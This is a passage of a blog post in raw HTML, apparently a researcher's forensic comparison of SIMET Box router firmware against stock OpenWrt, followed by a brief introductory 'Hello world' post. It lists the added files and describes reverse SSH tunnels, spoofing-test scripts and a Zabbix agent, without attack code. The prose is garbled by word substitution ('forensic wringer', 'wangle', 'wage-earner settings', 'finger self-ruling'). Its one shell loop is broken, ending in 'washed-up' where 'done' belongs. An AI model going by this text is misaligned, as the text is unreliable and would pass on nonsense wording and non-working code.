href="http://1.bp.blogspot.com/-roShQG4YNiQ/UhlleKed31I/AAAAAAAAACg/k4DYmx0s1Qs/s1600/diff1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="http://1.bp.blogspot.com/-roShQG4YNiQ/UhlleKed31I/AAAAAAAAACg/k4DYmx0s1Qs/s400/diff1.PNG" style="cursor: move;" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-hUk1jGuP7Pw/UhlleEac5YI/AAAAAAAAACc/9W9QhjlzF30/s1600/diff3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="http://1.bp.blogspot.com/-hUk1jGuP7Pw/UhlleEac5YI/AAAAAAAAACc/9W9QhjlzF30/s320/diff3.PNG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;">&nbsp;<a href="http://3.bp.blogspot.com/-otFB7OiraVw/UhlleTxuYcI/AAAAAAAAACk/SRWkhTrg-Vc/s1600/diff2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="499" src="http://3.bp.blogspot.com/-otFB7OiraVw/UhlleTxuYcI/AAAAAAAAACk/SRWkhTrg-Vc/s640/diff2.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>There are some new init.d scripts like atualiza_arqs, autossh, miniupnpd and zabbix_agentd:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-lzyzvYL8rCI/UhmLVEVxBuI/AAAAAAAAADw/vYTG5866ZVI/s1600/diff4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="555" src="http://1.bp.blogspot.com/-lzyzvYL8rCI/UhmLVEVxBuI/AAAAAAAAADw/vYTG5866ZVI/s640/diff4.png" width="640" /></a></div><br />Lots of binaries (/bin/busibox for example) are quite similar: they may have a small version difference or were compiled using particular writ line arguments:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-yQYQj50sLwg/UhmLVDnJrcI/AAAAAAAAADs/wUMpec24eOc/s1600/diff5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-yQYQj50sLwg/UhmLVDnJrcI/AAAAAAAAADs/wUMpec24eOc/s640/diff5.png" width="640" /></a></div><br />List of files created by SIMET Box (not present on the OpenWrt's wiring firmware):<br /><div class="code">while read -r i ; do file $i ; washed-up &lt; list.txt</div><div class="code">/etc/config/autossh: ASCII text<br />/etc/config/upnpd: ASCII text<br />/etc/dropbear/authorized_keys: OpenSSH DSA public key<br />/etc/dropbear/id_rsa: data<br />/etc/hotplug.d/button/00-button: ASCII text<br />/etc/hotplug.d/iface/20-autossh: POSIX shell script, ASCII text executable<br />/etc/hotplug.d/iface/50-miniupnpd: POSIX shell script, ASCII text executable<br />/etc/init.d/atualiza_arqs_simet: POSIX shell script, ASCII text executable<br />/etc/init.d/autossh: POSIX shell script, ASCII text executable<br />/etc/init.d/miniupnpd: POSIX shell script, ASCII text executable<br />/etc/init.d/zabbix_agentd: POSIX shell script, ASCII text executable<br />/etc/rc.d/S11sysctl: symbolic link to `../init.d/sysctl'<br />/etc/rc.d/S19firewall: symbolic link to `../init.d/firewall'<br />/etc/rc.d/S45atualiza_arqs_simet: symbolic link to `../init.d/atualiza_arqs_simet'<br />/etc/rc.d/S60zabbix_agentd: symbolic link to `../init.d/zabbix_agentd'<br />/etc/rc.d/S80autossh: symbolic link to `../init.d/autossh'<br />/etc/rc.d/S95miniupnpd: symbolic link to `../init.d/miniupnpd'<br />/etc/uci-defaults/50-reset: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/50-reset-wps: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/50-wifi: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/99-miniupnpd: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/luci-i18n-portuguese_brazilian: POSIX shell script, UTF-8 Unicode text executable<br />/etc/uci-defaults/luci-theme-bootstrap: POSIX shell script, ASCII text executable<br />/etc/uci-defaults/luci-upnp: POSIX shell script, ASCII text executable<br />/etc/zabbix_agentd.conf: ASCII text<br />/lib/libpthread-0.9.33.2.so: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked (uses shared libs), corrupted section header size<br />/lib/libpthread.so.0: symbolic link to `libpthread-0.9.33.2.so'<br />/root/.ssh/known_hosts: ASCII text, with very long lines<br />/sbin/fw3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/bin/auto_upgrade: symbolic link to `simet_tools'<br />/usr/bin/checa_udhcpc.sh: POSIX shell script, ASCII text executable<br />/usr/bin/get_mac_address.sh: POSIX shell script, ASCII text executable<br />/usr/bin/simet_client: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/bin/simet_dns: symbolic link to `simet_tools'<br />/usr/bin/simet_porta25: symbolic link to `simet_tools'<br />/usr/bin/simet_tools: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/bin/sshreversetunnel: POSIX shell script, ASCII text executable<br />/usr/bin/teste_spoofing.sh: POSIX shell script, ASCII text executable<br />/usr/bin/wifionoff: POSIX shell script, ASCII text executable<br />/usr/lib/lua/luci/controller/simet.lua: ASCII text<br />/usr/lib/lua/luci/controller/upnp.lua: ASCII text<br />/usr/lib/lua/luci/i18n/base.pt-br.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.ca.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.cs.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.de.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.es.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.fr.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.hu.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.it.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.ja.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.no.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.pl.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.pt-br.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.pt.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.ro.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.ru.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.vi.lmo: data<br />/usr/lib/lua/luci/i18n/upnp.zh-cn.lmo: data<br />/usr/lib/lua/luci/model/cbi/upnp/upnp.lua: ASCII text<br />/usr/lib/lua/luci/sgi/uhttpd.lua: ASCII text<br />/usr/lib/lua/luci/view/admin_status/index/upnp.htm: ASCII text<br />/usr/lib/lua/luci/view/simet/simet.htm: HTML document, UTF-8 Unicode text<br />/usr/lib/lua/luci/view/themes/bootstrap/footer.htm: HTML document, ASCII text<br />/usr/lib/lua/luci/view/themes/bootstrap/header.htm: HTML document, ASCII text<br />/usr/lib/lua/luci/view/upnp_status.htm: HTML document, ASCII text<br />/usr/lib/opkg/info/autossh.conffiles: ASCII text<br />/usr/lib/opkg/info/autossh.control: ASCII text<br />/usr/lib/opkg/info/autossh.list: ASCII text<br />/usr/lib/opkg/info/hping3.control: ASCII text<br />/usr/lib/opkg/info/hping3.list: ASCII text<br />/usr/lib/opkg/info/libip6tc.control: ASCII text<br />/usr/lib/opkg/info/libip6tc.list: ASCII text<br />/usr/lib/opkg/info/libnfnetlink.control: ASCII text<br />/usr/lib/opkg/info/libnfnetlink.list: ASCII text<br />/usr/lib/opkg/info/libopenssl.control: ASCII text<br />/usr/lib/opkg/info/libopenssl.list: ASCII text<br />/usr/lib/opkg/info/libpcap.control: ASCII text<br />/usr/lib/opkg/info/libpcap.list: ASCII text<br />/usr/lib/opkg/info/libpthread.control: ASCII text<br />/usr/lib/opkg/info/libpthread.list: ASCII text<br />/usr/lib/opkg/info/luci-app-simet.control: ASCII text<br />/usr/lib/opkg/info/luci-app-simet.list: ASCII text<br />/usr/lib/opkg/info/luci-app-upnp.control: ASCII text<br />/usr/lib/opkg/info/luci-app-upnp.list: ASCII text<br />/usr/lib/opkg/info/luci-i18n-portuguese-brazilian.control: ASCII text<br />/usr/lib/opkg/info/luci-i18n-portuguese-brazilian.list: ASCII text<br />/usr/lib/opkg/info/luci-sgi-uhttpd.control: ASCII text<br />/usr/lib/opkg/info/luci-sgi-uhttpd.list: ASCII text<br />/usr/lib/opkg/info/luci-theme-bootstrap.control: ASCII text<br />/usr/lib/opkg/info/luci-theme-bootstrap.list: ASCII text<br />/usr/lib/opkg/info/miniupnpd.conffiles: ASCII text<br />/usr/lib/opkg/info/miniupnpd.control: ASCII text<br />/usr/lib/opkg/info/miniupnpd.list: ASCII text<br />/usr/lib/opkg/info/simet-base-files.control: ASCII text<br />/usr/lib/opkg/info/simet-base-files.list: ASCII text<br />/usr/lib/opkg/info/simet-client.control: ASCII text<br />/usr/lib/opkg/info/simet-client.list: ASCII text<br />/usr/lib/opkg/info/simet-tools.control: ASCII text<br />/usr/lib/opkg/info/simet-tools.list: ASCII text<br />/usr/lib/opkg/info/uhttpd-mod-lua.control: ASCII text<br />/usr/lib/opkg/info/uhttpd-mod-lua.list: ASCII text<br />/usr/lib/opkg/info/zabbix-agentd.control: ASCII text<br />/usr/lib/opkg/info/zabbix-agentd.list: ASCII text<br />/usr/lib/opkg/info/zlib.control: ASCII text<br />/usr/lib/opkg/info/zlib.list: ASCII text<br />/usr/lib/libcrypto.so.1.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libip6tc.so: symbolic link to `libip6tc.so.0.0.0'<br />/usr/lib/libip6tc.so.0: symbolic link to `libip6tc.so.0.0.0'<br />/usr/lib/libip6tc.so.0.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libjson-c.so.2: symbolic link to `libjson-c.so.2.0.1'<br />/usr/lib/libjson-c.so.2.0.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libnfnetlink.so.0: symbolic link to `libnfnetlink.so.0.2.0'<br />/usr/lib/libnfnetlink.so.0.2.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libpcap.so: symbolic link to `libpcap.so.1.1'<br />/usr/lib/libpcap.so.1.1: symbolic link to `libpcap.so.1.1.1'<br />/usr/lib/libpcap.so.1.1.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libssl.so.1.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/libz.so: symbolic link to `libz.so.1.2.7'<br />/usr/lib/libz.so.1: symbolic link to `libz.so.1.2.7'<br />/usr/lib/libz.so.1.2.7: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/lib/uhttpd_lua.so: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />/usr/sbin/autossh: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/sbin/hping3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/sbin/miniupnpd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/sbin/zabbix_agentd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />/usr/share/libiwinfo/hardware.txt: ASCII text<br />/usr/share/miniupnpd/firewall.include: POSIX shell script, ASCII text executable<br />/www/luci-static/bootstrap/cascade.css: assembler source, ASCII text<br />/www/luci-static/bootstrap/favicon.ico: MS Windows icon resource - 1 icon<br />/www/luci-static/bootstrap/html5.js: HTML document, ASCII text, with very long lines<br />/www/simet/ceptro.png: PNG image data, 78 x 30, 8-bit colormap, non-interlaced<br />/www/simet/cgi.png: PNG image data, 46 x 30, 8-bit colormap, non-interlaced<br />/www/simet/nic.png: PNG image data, 47 x 25, 8-bit colormap, non-interlaced<br />/www/simet/nonet.htm: UTF-8 Unicode text<br />/www/simet/offline.jpg: JPEG image data, EXIF standard<br />/www/simet/simetbox_minilogo.png: PNG image data, 111 x 23, 8-bit colormap, non-interlaced<br />/www/simet/view_tab.css: assembler source, ASCII text<br />/www/simet/view_tab.js: UTF-8 Unicode text, with very long lines</div><br /><div style="text-align: left;"><span style="font-family: inherit;">This simple technique is quite useful for forensic wringer of embedded devices, as you have a&nbsp;</span>white-list<span style="font-family: inherit;">&nbsp;of known binaries and config files.&nbsp;</span>It's important to review both created and modified files, but I'll focus on the ones listed above.&nbsp;<span style="font-family: inherit;">Each binary and config file can be reviewed&nbsp;</span>separately so we can find interesting entries like:</div><div style="text-align: left;"><br /></div><ul><li>SSH reverse tunnel settings and authorized_keys:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-CelatLZx8xM/Uhl0ruKp8qI/AAAAAAAAADA/oYMcxpabkRA/s1600/p1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="http://2.bp.blogspot.com/-CelatLZx8xM/Uhl0ruKp8qI/AAAAAAAAADA/oYMcxpabkRA/s640/p1.png" width="640" /></a></div><ul><li>Password waffly scripts and Iptables rules:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-1e5dEVMk5jk/Uhl0rawKnlI/AAAAAAAAAC8/7QAr0oHVbp4/s1600/p2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="http://2.bp.blogspot.com/-1e5dEVMk5jk/Uhl0rawKnlI/AAAAAAAAAC8/7QAr0oHVbp4/s640/p2.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><ul><li style="text-align: left;">The device management starting page&nbsp;has an external iframe and users are identified by their MAC Address&nbsp;via HTTP GET requests:</li></ul><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-lqQQiuRKyHc/Uhl3Y8dIS_I/AAAAAAAAADQ/zMrQZsgNGrM/s1600/p3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="http://1.bp.blogspot.com/-lqQQiuRKyHc/Uhl3Y8dIS_I/AAAAAAAAADQ/zMrQZsgNGrM/s640/p3.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: left;"></div><ul><li>Cronjobs to test external wangle to port 25 and if the ISP allows IP spoofing:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-8fl8B1__u_k/Uhl4lT-yiSI/AAAAAAAAADc/WUGTvdmCpIA/s1600/p5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://1.bp.blogspot.com/-8fl8B1__u_k/Uhl4lT-yiSI/AAAAAAAAADc/WUGTvdmCpIA/s640/p5.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><ul><li><span style="text-align: left;">Script using hping3 to test if the user's ISP allows packet spoofing:</span></li></ul><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-tnsWwuYLEvk/UhmQbjn0XfI/AAAAAAAAAEM/5VY6aBiY-zE/s1600/p4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="http://1.bp.blogspot.com/-tnsWwuYLEvk/UhmQbjn0XfI/AAAAAAAAAEM/5VY6aBiY-zE/s640/p4.png" width="640" /></a></div><ul><li>Zabbix wage-earner settings:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-M696DudxwsE/UhmQPGfjnsI/AAAAAAAAAEE/yEd8vOsnT9Y/s1600/p6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="http://2.bp.blogspot.com/-M696DudxwsE/UhmQPGfjnsI/AAAAAAAAAEE/yEd8vOsnT9Y/s640/p6.png" width="640" /></a></div><div><br /></div><div class="separator" style="clear: both; text-align: left;">As a quick translating to SIMET engineers, it would be nice to have HTTPS for those external queries, a bit increasingly of transparency on what the equipment does internally, who's worldly-wise to wangle it (whose authorized_keys are those?), what external IP addresses it communicates with and what information is stuff collected. Securing SOHO modems is very important, specially here in Brazil where lots of recent attacks were targeting these devices (<a href="https://twitter.com/assolini">Fabio Assolini's</a> talk "<a href="http://www.securelist.com/en/blog/208193852/The_tale_of_one_thousand_and_one_DSL_modems">The tale of one thousand and one DSL modems</a>" detailed this a year ago).</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><span style="text-align: start;">On the next post I'll detail how to run those MIPS32 binaries on a virtual environment using QEMU and unriddle some of the files with IDA Pro.</span></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com8tag:blogger.com,1999:blog-3296471108082693838.post-90544217137691170542013-08-24T18:57:00.003-03:002013-08-25T02:38:30.955-03:00Hello worldI just started this new Blog to talk well-nigh some personal projects, exploits and hacking in general. I'm a Brazilian Infosec guy interested on embedded device hacking (modems, routers etc), webapp security, panel hacking and forensics. My twitter handle is <a href="https://twitter.com/bernardomr">@bernardomr</a>, finger self-ruling to ping me.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-8RzuHTN5JCI/UhktnBiiqWI/AAAAAAAAABE/t2nRUrM9n5Y/s1600/hworld.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-8RzuHTN5JCI/UhktnBiiqWI/AAAAAAAAABE/t2nRUrM9n5Y/s200/hworld.png" width="196" /></a></div><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0